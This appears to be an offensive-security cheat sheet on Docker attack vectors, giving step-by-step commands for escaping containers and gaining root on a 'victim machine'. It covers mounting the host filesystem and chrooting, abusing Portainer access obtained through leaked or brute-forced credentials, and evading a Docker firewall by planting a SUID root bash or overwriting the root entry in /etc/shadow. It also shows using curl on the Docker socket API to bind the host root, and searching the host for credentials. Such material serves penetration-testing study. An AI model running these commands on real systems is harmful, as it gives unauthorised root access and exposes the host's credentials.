Docker-Related Attack Vectors
Docker Socket
If you have user privileges in a host machine check these:
Find
netstat -tunape
docker socket in localhostexport it to env
export DOCKER_HOST="tcp://localhost:2222"
Look docker images in host machine and run it with connecting host
docker run -it -v /:/host ubuntu:20.04 bash
cd /host/
chroot ./ bash
find / -name password
Portainer Web UI access
If you have portainer access, (via leaked creds or bruteforce)
Create privileged docker via portainer web UI
Later connect there via from web ui of portainer:
mount /dev/sda /mnt
cd /mnt
chroot ./ bash
Then find credentials in root mounted
Use Case (Blocked by privileged mode but run in seccomp)
You are user in victim machine and want to get root and blocked by docker firewall when you run
docker run -d --privileged ubuntu:latest
Then you can run
docker run -d --security-opt "seccomp=unconfined" modified-ubuntu
With that way we can start a container with seccomp profile set to unconfined.
docker exec -it --privileged {container_id} bash
Check it with capsh --print
Then use cap_sys_module breakout technique to breakout the container.
Use Case (Blocked by Docker Firewall Api )
In that case you are user in host machine and by using docker trying to get root user.
Check that command
docker run -it --privileged ubuntu:18.04 bash
If it is blocked by Docker Firewall then
cp /bin/bash /tmp/
docker run -it -v /tmp:/host ubuntu:18.04 bash
in docker
chown root:root /host/bash
chmod u+s /host/bash
then exit
in host machine it self run
/tmp/bash -p
your effective uid is 0.
Use Case (Blocked by Docker Firewall Api - 2 )
In that case you are user in host machine and by using docker trying to get root user.
Check that command
docker run -it --privileged ubuntu:18.04 bash
If it is blocked by Docker Firewall then
test it with /tmp, /etc,
docker run -it -v /etc:/host ubuntu:18.04 bash
Check /host directory
then create password entry with openssl
openssl passwd -1 -salt abc abc
take that string and put in /host/shadow puth that string in root place.
then exit from docker and in host machine be root with the password that you have written in openssl command.
Use Case (Blocked by Docker Firewall Api - 3 [Using Docker API])
In that case you are user in host machine and by using docker trying to get root user.
Check that command
docker run -it --privileged ubuntu:18.04 bash
If it is blocked by Docker Firewall then
When docker client is used, docker client interacts with the docker socket by using the HTTP API, the JSON data sent by docker client follows the JSON format mentioned on the docker API references. Identify the API version used by the docker client.
So by sending request to docker socket we can get in contact with docker.
Send that request with curl
curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Image": "ubuntu", "Binds":["/:/host"]}' http:/v1.40/containers/create
and it will create us a privileged container via API request
check it via
docker ps -a
start the container docker start container_id
and
run docker exec -it container_id bash
now check host directory and you are in host machine.
Some Docker Rest API Commands that can be used
Last updated